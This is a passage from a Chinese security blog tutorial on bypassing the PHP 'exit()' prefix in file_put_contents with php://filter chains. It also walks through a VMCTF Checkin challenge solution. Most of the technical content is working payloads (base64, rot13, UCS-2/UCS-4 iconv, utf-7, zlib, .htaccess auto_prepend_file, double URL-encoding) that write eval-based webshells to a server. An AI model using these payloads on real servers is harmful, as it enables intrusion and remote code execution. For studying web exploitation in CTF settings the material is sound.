<p>修改后重启服务器，这样所有页面的顶部与底部都会<code>require /home/fdipzone/header.php</code>与 <code>/home/fdipzone/footer.php</code></p>
<p>如果不需要所有页面都在顶部或底部<code>require</code>文件，可以指定某一个文件夹内的页面文件才调用<code>auto_prepend_file</code>与<code>auto_append_file</code><br>在需要顶部或底部加载文件的文件夹中加入<code>.htaccess</code>文件，内容如下：</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">php_value</span> auto_prepend_file <span class="hljs-string">&quot;/home/fdipzone/header.php&quot;</span><br>php_value auto_append_file <span class="hljs-string">&quot;/home/fdipzone/footer.php&quot;</span><br></code></pre></td></tr></table></figure>

<p>这样在指定<code>.htaccess</code>的文件夹内的页面文件才会加载<code>/home/fdipzone/header.php</code>与<code>/home/fdipzone/footer.php</code>，其他页面文件不受影响。</p>
<p>自定义包含我们的flag文件。</p>
<p>payload：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">?filename=php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/write=string.strip_tags/</span>resource=.htaccess&amp;content=?&gt;php_value auto_prepend_file <span class="hljs-string">&quot;/flag&quot;</span><br></code></pre></td></tr></table></figure>

<p>首先来解释<code>$filename</code>的代码，这里引用了<code>string.strip_tags</code>过滤器，可以过滤<code>.htaccess</code>内容的<code>html</code>标签，自然也就消除了死亡代码；<code>$content</code>即闭合死亡代码使其完全消除，并且写入自定义包含文件；</p>
<h3 id="bypass相同变量"><a href="#bypass相同变量" class="headerlink" title="bypass相同变量"></a>bypass相同变量</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$content</span> = <span class="hljs-variable">$_GET</span>[content];<br>file_put_contents(<span class="hljs-variable">$content</span>,<span class="hljs-string">&#x27;&lt;?php exit();&#x27;</span>.<span class="hljs-variable">$content</span>);<br></code></pre></td></tr></table></figure>

<p>这种情况下写入的文件，其文件名和文件部分内容一致，这就导致利用的难度大大增加了，不过最终目的还是相同的：都是为了去除文件头部内容<code>exit</code>这个关键代码写入<code>shell</code>后门。</p>
<h4 id="base64"><a href="#base64" class="headerlink" title="base64"></a>base64</h4><p>构造：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php">content=php:<span class="hljs-comment">//filter/convert.base64-decode/PD9waHAgcGhwaW5mbygpOz8+/resource=shell.php</span><br><br>或<br><br>content=php:<span class="hljs-comment">//filter/convert.base64-decode/resource=PD9waHAgcGhwaW5mbygpOz8+.php</span><br></code></pre></td></tr></table></figure>

<p>进行拼接之后就是 <code>&lt;?php exit();php://filter/convert.base64-decode/resource=PD9waHAgcGhwaW5mbygpOz8+.php</code> 然后会对其进行一次整体的 <code>base64-decode</code> 。从而分解掉死亡代码，</p>
<p>但是无法生成<code>content</code>；虽然文件创建成功，但是就是无法生成<code>content</code>。问题在于<code>resource</code>后边的 <code>=</code>；</p>
<p><img src="https://github.com/woshilnp/woshilnp.github.io/blob/master/wzimg/252.png?raw=true" alt="a"></p>
<p><code>‘=’</code>在<code>base64</code>中的作用是填充，也就是以为着结束；在<code>‘=’</code>的后面是不允许有任何其他字符的否则会报错，</p>
<p><img src="https://github.com/woshilnp/woshilnp.github.io/blob/master/wzimg/253.png?raw=true" alt="a"></p>
<p><img src="https://github.com/woshilnp/woshilnp.github.io/blob/master/wzimg/254.png?raw=true" alt="a"></p>
<p>这里因为是由于<code>‘=’</code>从而使得我们写入<code>content</code>不成功，那么我们可以想个方法去掉等号即可，</p>
<p>去掉等号之过滤器嵌套base64</p>
<p>payload：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">content</span>=php://filter/string.strip_tags|convert.base<span class="hljs-number">64</span>-decode/resource=?&gt;PD<span class="hljs-number">9</span>waHAgcGhwaW<span class="hljs-number">5</span>mbygpOz<span class="hljs-number">8</span>+.php<br></code></pre></td></tr></table></figure>

<p><img src="https://github.com/woshilnp/woshilnp.github.io/blob/master/wzimg/255.png?raw=true" alt="a"></p>
<p><img src="https://github.com/woshilnp/woshilnp.github.io/blob/master/wzimg/256.png?raw=true" alt="a"></p>
<p>发现可以生成文件，并且可以看到我们已经成功写入了<code>shell</code>；但是文件名确实有问题，当我们在浏览器访问的时候，会出现访问不到的问题，这里是因为引号的问题；那么如何避免，我们可以使用伪目录的方法，进行变相的绕过去；</p>
<p>payoad:</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">content=php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/string.strip_tags|convert.base64-decode/</span>resource=?&gt;PD9waHAgcGhwaW5mbygpOz8%<span class="hljs-number">2</span>b<span class="hljs-regexp">/../</span>shell.php<br></code></pre></td></tr></table></figure>

<p>注意：这里<code>%2b</code>是<code>+</code>号的url编码，不进行编码会被当成空格处理</p>
<p>我们将前面的一串<code>base64</code>字符和闭合的符号整体看作一个目录，虽然没有，但是我们后面重新撤回了原目录，生成<code>shell.php</code>文件；从而就可以生成正常的文件名.</p>
<p>或者去掉等号之直接对内容进行变性另类<code>base64</code></p>
<p>其实这种也是借助于过滤器，但是原理并不是和之前的原理一样，之前的原理即是：闭合原本的死亡代码，然后在进行过滤器过滤掉内容中的<code>html</code>标签，从而对剩下的内容进行<code>base64</code>解码。但是这种方法却不是如此，payload如下：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/&lt;?|string.strip_tags|convert.base64-decode/</span>resource=?&gt;PD9waHAgcGhwaW5mbygpOz8%<span class="hljs-number">2</span>b<span class="hljs-regexp">/../</span>shell.php<br></code></pre></td></tr></table></figure>

<p>这种<code>payload</code>的攻击原理即是首先直接在内容时，就将我们<code>base64</code>遇到的<code>‘=’</code>这个问题直接写在<code>&lt;? ?&gt;</code>中进行过滤掉，然后<code>base64-decode</code>再对原本内容的<code>&lt;?php exit();</code>进行转码，从而达到分解死亡代码的效果</p>
<h4 id="rot13绕过-1"><a href="#rot13绕过-1" class="headerlink" title="rot13绕过"></a>rot13绕过</h4><p>尽管<code>base64</code>比较特别，但是并不是所有的编码都受限于‘=’，这里可以采用rot13编码即可；</p>
<p>payload：</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">content=php://<span class="hljs-built_in">filter</span>/<span class="hljs-built_in">write</span>=<span class="hljs-keyword">string</span>.rot13|<span class="hljs-meta">&lt;?</span>cuc cucvasb();<span class="hljs-meta">?&gt;</span>|/resource=<span class="hljs-built_in">shell</span>.php<br><br>content=php://<span class="hljs-built_in">filter</span>/<span class="hljs-built_in">write</span>=<span class="hljs-keyword">string</span>.rot13/resource=<span class="hljs-meta">&lt;?</span>cuc cucvasb();<span class="hljs-meta">?&gt;</span>/../<span class="hljs-built_in">shell</span>.php<br></code></pre></td></tr></table></figure>

<p>生成文件内容：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?</span>cuc rkvg();cuc:<span class="hljs-comment">//svygre/jevgr=fgevat.ebg13|<span class="hljs-meta">&lt;?php</span> phpinfo();<span class="hljs-meta">?&gt;</span>|/erfbhepr=f1zcyr.cuc</span><br></code></pre></td></tr></table></figure>

<p>其原理就是利用转码从而将原本的死亡代码进行转码从而使引擎无法识别从而避免死亡代码；</p>
<h4 id="convert-iconv-1"><a href="#convert-iconv-1" class="headerlink" title="convert.iconv.*"></a>convert.iconv.*</h4><p>对于<code>iconv</code>字符编码转换进行绕过的手法，其实类似于上面所述的<code>base64</code>编码手段，都是先对原有字符串进行某种编码然后再解码，这个过程导致最初的限制<code>exit;</code>去除，而我们的恶意代码正常解码存储。</p>
<ul>
<li><strong>usc-2</strong></li>
</ul>
<p>通过UCS-2方式，对目标字符串进行2位一反转（这里的2LE和2BE可以看作是小端和大端的列子），也就是说构造的恶意代码需要是UCS-2中2的倍数，不然不能进行正常反转（多余不满足的字符串会被截断），那我们就可以利用这种过滤器进行编码转换绕过了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">echo</span> iconv(<span class="hljs-string">&quot;UCS-2LE&quot;</span>,<span class="hljs-string">&quot;UCS-2BE&quot;</span>,<span class="hljs-string">&#x27;&lt;?php @eval($_POST[ab]);?&gt;&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">php:<span class="hljs-comment">//filter/convert.iconv.UCS-2LE.UCS-2BE|?&lt;hp pe@av(l_$OPTSa[]b;)&gt;?/resource=shell.php</span><br></code></pre></td></tr></table></figure>

<p>成功向 <code>shell.php</code> 写入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?&lt;hp pxeti)(p;ph/:f/liet/rocvnre.tcino.vCU-SL2.ECU-SB2|E<span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[ab]);<span class="hljs-meta">?&gt;</span>r/seuocr=ehsle.l<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>usc-4</strong></li>
</ul>
<p>通过UCS-4方式，对目标字符串进行4位一反转（这里的4LE和4BE可以看作是小端和大端的列子），也就是说构造的恶意代码需要是UCS-4中4的倍数，不然不能进行正常反转（多余不满足的字符串会被截断），那我们就可以利用这种过滤器进行编码转换绕过了.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">echo</span> iconv(<span class="hljs-string">&quot;UCS-4LE&quot;</span>,<span class="hljs-string">&quot;UCS-4BE&quot;</span>,<span class="hljs-string">&#x27;&lt;?php @eval($_POST[abcd]);?&gt;&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>28字符 <code>&lt;?php @eval($_POST[abcd]);?&gt;</code> 转为 <code>hp?&lt;e@ p(lavOP_$a[TS]dcb&gt;?;)</code></p>
<p>payload:</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-attribute">content</span>=php://filter/convert.iconv.UCS-4LE.UCS-4BE|hp?&lt;e@ p(lavOP_<span class="hljs-variable">$a</span>[TS]dcb&gt;?;)/<span class="hljs-attribute">resource</span>=shell.php<br></code></pre></td></tr></table></figure>

<p>成功写入：</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="xml">hp?<span class="hljs-tag">&lt;<span class="hljs-name">xe</span> <span class="hljs-attr">p</span>)(<span class="hljs-attr">tiphp</span>;<span class="hljs-attr">f</span>//<span class="hljs-attr">:etlioc</span>/<span class="hljs-attr">rrevnci.t.vno-SCU.EL4-SCU</span>|<span class="hljs-attr">EB4</span></span></span><span class="php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[abcd]);<span class="hljs-meta">?&gt;</span></span><span class="xml"><span class="hljs-tag"><span class="hljs-attr">ser</span>/<span class="hljs-attr">cruohs</span>=<span class="hljs-string">e.lle</span></span></span><br></code></pre></td></tr></table></figure>

<ul>
<li><strong>utf8-utf7</strong></li>
</ul>
<p><img src="https://github.com/woshilnp/woshilnp.github.io/blob/master/wzimg/257.png?raw=true" alt="a"></p>
<p>这里发现生成的是<code>+AD0-</code>,然而经过检测，此字符串可以被<code>base64</code>进行解码；那也就意味着我们可以使用这种方法避免等号对我们<code>base64</code>解码的影响；我们可以直接写入<code>base64</code>加密后的<code>payload</code>，然后将其进行<code>utf</code>之间的转换，因为纯字符转换之后还是其本身；所以其不受影响，进而我们的<code>base64-encode</code>之后的编码依然是存在的，然后进行<code>base64-decode</code>一下，写入shell.</p>
<p>payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">content=php:<span class="hljs-comment">//filter/write=aaaaXDw/cGhwIEBldmFsKCRfUE9TVFthXSk7ID8+|convert.iconv.utf-8.utf-7|convert.base64-decode/resource=shell.php</span><br></code></pre></td></tr></table></figure>

<p>ps：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-regexp">//</span> 这里要符合base64 解码按<span class="hljs-number">4</span> 字节进行<br><br>utf8 -&gt; utf-<span class="hljs-number">7</span><br><br>&lt;?php <span class="hljs-keyword">exit</span>();php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/write=aaaaXDw/</span>cGhwIEBldmFsKCRfUE9TVFthXSk7ID8+|convert.iconv.utf-<span class="hljs-number">8</span>.utf-<span class="hljs-number">7</span>|convert.base64-decode/resource=shell.php<br><br>变为：<br><br>+ADw?php <span class="hljs-keyword">exit</span>()+ADs-php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/write+AD0-aaaaXDw/</span>cGhwIEBldmFsKCRfUE9TVFthXSk7ID8+-+AHw-convert.iconv.utf-<span class="hljs-number">8</span>.utf-<span class="hljs-number">7</span>+AHw-convert.base64-decode/resource+AD0-shell.php<br><br>base64恶意payload的之前正好<span class="hljs-number">36</span>个字节，所以写入了shell<br><br></code></pre></td></tr></table></figure>

<p><img src="https://github.com/woshilnp/woshilnp.github.io/blob/master/wzimg/258.png?raw=true" alt="a"></p>
<h3 id="VMCTF-Checkin"><a href="#VMCTF-Checkin" class="headerlink" title="VMCTF Checkin"></a>VMCTF Checkin</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">//PHP 7.0.33 Apache/2.4.25</span><br>error_reporting(<span class="hljs-number">0</span>);<br><span class="hljs-variable">$sandbox</span> = <span class="hljs-string">&#x27;/var/www/html/&#x27;</span> . md5(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;HTTP_X_REAL_IP&#x27;</span>]);<br>@mkdir(<span class="hljs-variable">$sandbox</span>);<br>@chdir(<span class="hljs-variable">$sandbox</span>);<br>highlight_file(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;content&#x27;</span>])) &#123;<br>    <span class="hljs-variable">$content</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;content&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(preg_match(<span class="hljs-string">&#x27;/iconv|UCS|UTF|rot|quoted|base64/i&#x27;</span>,<span class="hljs-variable">$content</span>))<br>         <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;hacker&#x27;</span>);<br>    <span class="hljs-keyword">if</span>(file_exists(<span class="hljs-variable">$content</span>))<br>        <span class="hljs-keyword">require_once</span>(<span class="hljs-variable">$content</span>);<br>    <span class="hljs-keyword">echo</span> <span class="hljs-variable">$content</span>;<br>    file_put_contents(<span class="hljs-variable">$content</span>,<span class="hljs-string">&#x27;&lt;?php exit();&#x27;</span>.<span class="hljs-variable">$content</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这里主要就是考察过滤器构造绕过</p>
<p>题目中过滤的过滤器有</p>
<figure class="highlight coq"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs coq">/iconv|<span class="hljs-type">UCS</span>|<span class="hljs-type">UTF</span>|<span class="hljs-type">rot</span>|<span class="hljs-type">quoted</span>|<span class="hljs-type">base64</span>/<br></code></pre></td></tr></table></figure>

<p>但是需要注意<code>file_put_contents</code>要调用伪协议，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-built_in">static</span> <span class="hljs-keyword">void</span> php_stream_apply_filter_list(php_stream *stream, char *filterlist, <span class="hljs-keyword">int</span> read_chain, <span class="hljs-keyword">int</span> write_chain) <br>&#123;<br>	char *p, *token = <span class="hljs-literal">NULL</span>;<br>	php_stream_filter *temp_filter;<br><br>	p = php_strtok_r(filterlist, <span class="hljs-string">&quot;|&quot;</span>, &amp;token);<br>	<span class="hljs-keyword">while</span> (p) &#123;<br>		php_url_decode(p, strlen(p));<span class="hljs-comment">#对过滤器进行了一次urldecode</span><br>		<span class="hljs-keyword">if</span> (read_chain) &#123;<br>			<span class="hljs-keyword">if</span> ((temp_filter = php_stream_filter_create(p, <span class="hljs-literal">NULL</span>, php_stream_is_persistent(stream)))) &#123;<br>				php_stream_filter_append(&amp;stream-&gt;readfilters, temp_filter);<br>			&#125; <span class="hljs-keyword">else</span> &#123;<br>				php_error_docref(<span class="hljs-literal">NULL</span>, E_WARNING, <span class="hljs-string">&quot;Unable to create filter (%s)&quot;</span>, p);<br>			&#125;<br>		&#125;<br>		<span class="hljs-keyword">if</span> (write_chain) &#123;<br>			<span class="hljs-keyword">if</span> ((temp_filter = php_stream_filter_create(p, <span class="hljs-literal">NULL</span>, php_stream_is_persistent(stream)))) &#123;<br>				php_stream_filter_append(&amp;stream-&gt;writefilters, temp_filter);<br>			&#125; <span class="hljs-keyword">else</span> &#123;<br>				php_error_docref(<span class="hljs-literal">NULL</span>, E_WARNING, <span class="hljs-string">&quot;Unable to create filter (%s)&quot;</span>, p);<br>			&#125;<br>		&#125;<br>		p = php_strtok_r(<span class="hljs-literal">NULL</span>, <span class="hljs-string">&quot;|&quot;</span>, &amp;token);<br>	&#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>而伪协议处理时会对过滤器 <code>urldecode</code> 一次，所以是可以利用二次编码绕过的，</p>
<p>payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">php:<span class="hljs-comment">//filter/write=string.%7%32ot13|<span class="hljs-meta">&lt;?</span>cuc cucvasb();<span class="hljs-meta">?&gt;</span>|/resource=w0s1np.php</span><br></code></pre></td></tr></table></figure>

<p>注：<code>payload</code>放过滤器的位置或者放文件名位置都可（因为有些编码有时候会有空格什么的乱码，文件名不一定好用），<code>php://filter</code>面对不可用的规则是报个<code>Warning</code>，然后跳过继续执行的）。</p>
<p>还可以利用压缩过滤器以及加密过滤器：</p>
<p><code>zlib</code> 的 <code>zlib.deflate</code> 和 <code>zlib.inflate</code> ，组合使用压缩后再解压后内容肯定不变，不过我们可以在中间遍历一下剩下的几个过滤器，看看中间进行什么操作会影响后续 <code>inflate</code> 的内容，简单遍历一下可以发现中间插入 <code>string.tolower</code> 转后会把空格和 <code>exit</code> 处理了就可以绕过exit</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">php:<span class="hljs-comment">//filter/zlib.deflate|string.tolower|zlib.inflate|<span class="hljs-meta">?&gt;</span><span class="hljs-meta">&lt;?php</span>%0deval($_GET[1]);<span class="hljs-meta">?&gt;</span>/resource=shell.php</span><br></code></pre></td></tr></table></figure>


    </div>
</article>



<script>
    //检测推送
    var pushType = "";
    var pushLink = "";
    var siteName = "w0s1np&#39;s blog";
  
    var ValineButton = document.getElementsByClassName("vsubmit vbtn")[0];
    //分情况推送
    if (pushType === "sc") {
      var title = "text=" + siteName + "上又有新评论啦~!";
      function send_valine_Server() {
        //获取元素信息
        var pagename = document.title;
        var wz = pagename.indexOf("|");
        var res = pagename.substring(0, wz);
        var pageurl = document.URL;
        var ptime = new Date();
        var vnick = document.getElementsByClassName("vnick vinput")[0].value;
        var vmail = document.getElementsByClassName("vmail vinput")[0].value;
        var vlink = document.getElementsByClassName("vlink vinput")[0].value;
        var veditor = document.getElementsByClassName("veditor vinput")[0].value;
        var text = "desp=";
        var data =
          text +
          "|昵称：" +
          "|邮箱：" +
          "|网站地址：" +
          "|当前页面：" +
          "|评论内容：" +
          "|跳转链接：" +
          "|评论时间" +
          "\n" +
          "|----|----|----|----|" +
          "\n" +
          "|   " +
          vnick +
          "   |   " +
          vmail +
          "  |  " +
          vlink +
          "|   " +
          res +
          "| " +
          veditor +
          "| " +
          pageurl +
          "|" +
          ptime.toLocaleString() +
          "|";
        var httpRequest = new XMLHttpRequest(); //第一步：创建需要的对象
        httpRequest.open("POST", pushLink, true); //第二步：打开连接
        httpRequest.setRequestHeader(
          "Content-type",
          "application/x-www-form-urlencoded"
        ); //设置请求头 注：post方式必须设置请求头（在建立连接后设置请求头）
        httpRequest.send(title + "&" + data); //发送请求 将情头体写在send中
      }
      ValineButton.onclick = send_valine_Server;
    } else if (pushType === "qmsg") {
      var title = "msg=" + siteName + "上又有新评论啦~!\n";
      function send_valine_Qmsg() {
        //获取元素信息
        var pagename = document.title;
        var wz = pagename.indexOf("|");
        var res = pagename.substring(0, wz);
        var pageurl = document.URL;
        var ptime = new Date();
        var vnick = document.getElementsByClassName("vnick vinput")[0].value;
        var vmail = document.getElementsByClassName("vmail vinput")[0].value;
        var vlink = document.getElementsByClassName("vlink vinput")[0].value;
        var veditor = document.getElementsByClassName("veditor vinput")[0].value;
        var data =
          "昵称：" +
          vnick +
          "\n邮箱：" +
          vmail +
          "\n网站地址：" +
          vlink +
          "\n当前页面：" +
          pagename +
          "\n评论内容：" +
          veditor +
          "\n跳转链接：" +
          pageurl +
          "\n评论时间" +
          ptime.toLocaleString();
        var httpRequest = new XMLHttpRequest(); //第一步：创建需要的对象
        httpRequest.open("POST", pushLink, true); //第二步：打开连接
        httpRequest.setRequestHeader(
          "Content-type",
          "application/x-www-form-urlencoded"
        ); //设置请求头 注：post方式必须设置请求头（在建立连接后设置请求头）
        httpRequest.send(title + data); //发送请求 将情头体写在send中
      }
      ValineButton.onclick = send_valine_Qmsg;
    }
  </script>
    
        <div id="footer-post-container">
    <div id="footer-post">

        <div id="nav-footer" style="display: none">
            <ul>
                
                    <li><a href="/">Home</a></li>
                
                    <li><a href="/archives/">Articles</a></li>
                
                    <li><a href="/categories/">Category</a></li>
                
                    <li><a href="/tags/">Tag</a></li>
                
                    <li><a href="/about/">About</a></li>
                
                    <li><a href="/search/">Search</a></li>
                
            </ul>
        </div>

        <div id="toc-footer" style="display: none">
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%AF%A6%E8%A7%A3php-filter%E4%BB%A5%E5%8F%8A%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87"><span class="toc-number">1.</span> <span class="toc-text">详解php:&#x2F;&#x2F;filter以及死亡绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#php-filter"><span class="toc-number">1.1.</span> <span class="toc-text">php:&#x2F;&#x2F;filter</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.2.</span> <span class="toc-text">过滤器</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.2.1.</span> <span class="toc-text">字符串过滤器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#string-strip-tags"><span class="toc-number">1.2.2.</span> <span class="toc-text">string.strip_tags</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BD%AC%E6%8D%A2%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.2.3.</span> <span class="toc-text">转换过滤器</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#convert-base64"><span class="toc-number">1.2.3.1.</span> <span class="toc-text">convert.base64</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#convert-quoted"><span class="toc-number">1.2.3.2.</span> <span class="toc-text">convert.quoted</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#convert-iconv"><span class="toc-number">1.2.3.3.</span> <span class="toc-text">convert.iconv.*</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%8B%E7%BC%A9%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.2.4.</span> <span class="toc-text">压缩过滤器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8A%A0%E5%AF%86%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.2.5.</span> <span class="toc-text">加密过滤器</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E6%AD%BB%E4%BA%A1exit"><span class="toc-number">1.3.</span> <span class="toc-text">绕过死亡exit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#bypass%E4%B8%8D%E5%90%8C%E5%8F%98%E9%87%8F"><span class="toc-number">1.3.1.</span> <span class="toc-text">bypass不同变量</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#base64%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.1.1.</span> <span class="toc-text">base64绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#rot13%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.1.2.</span> <span class="toc-text">rot13绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#string-strip-tags-1"><span class="toc-number">1.3.1.3.</span> <span class="toc-text">string.strip_tags</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#htaccess%E7%9A%84%E9%A2%84%E5%8C%85%E5%90%AB%E5%A4%84%E7%90%86"><span class="toc-number">1.3.1.4.</span> <span class="toc-text">.htaccess的预包含处理</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#bypass%E7%9B%B8%E5%90%8C%E5%8F%98%E9%87%8F"><span class="toc-number">1.3.2.</span> <span class="toc-text">bypass相同变量</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#base64"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">base64</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#rot13%E7%BB%95%E8%BF%87-1"><span class="toc-number">1.3.2.2.</span> <span class="toc-text">rot13绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#convert-iconv-1"><span class="toc-number">1.3.2.3.</span> <span class="toc-text">convert.iconv.*</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#VMCTF-Checkin"><span class="toc-number">1.3.3.</span> <span class="toc-text">VMCTF Checkin</span></a></li></ol></li></ol></li></ol>
        </div>

        <div id="share-footer" style="display: none">
            <ul>
    <li><a class="icon"
           target="_blank" rel="noopener" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://example.com/2021/05/23/%E8%AF%A6%E8%A7%A3php-filter%E4%BB%A5%E5%8F%8A%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/&title=详解php://filter以及死亡绕过"><i
                    class="fab fa-qq fa-lg" aria-hidden="true"></i></a></li>
    <li><a class="icon"
           target="_blank" rel="noopener" href="https://service.weibo.com/share/share.php?url=http://example.com/2021/05/23/%E8%AF%A6%E8%A7%A3php-filter%E4%BB%A5%E5%8F%8A%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/&title=详解php://filter以及死亡绕过"><i
                    class="fab fa-weibo fa-lg" aria-hidden="true"></i></a></li>
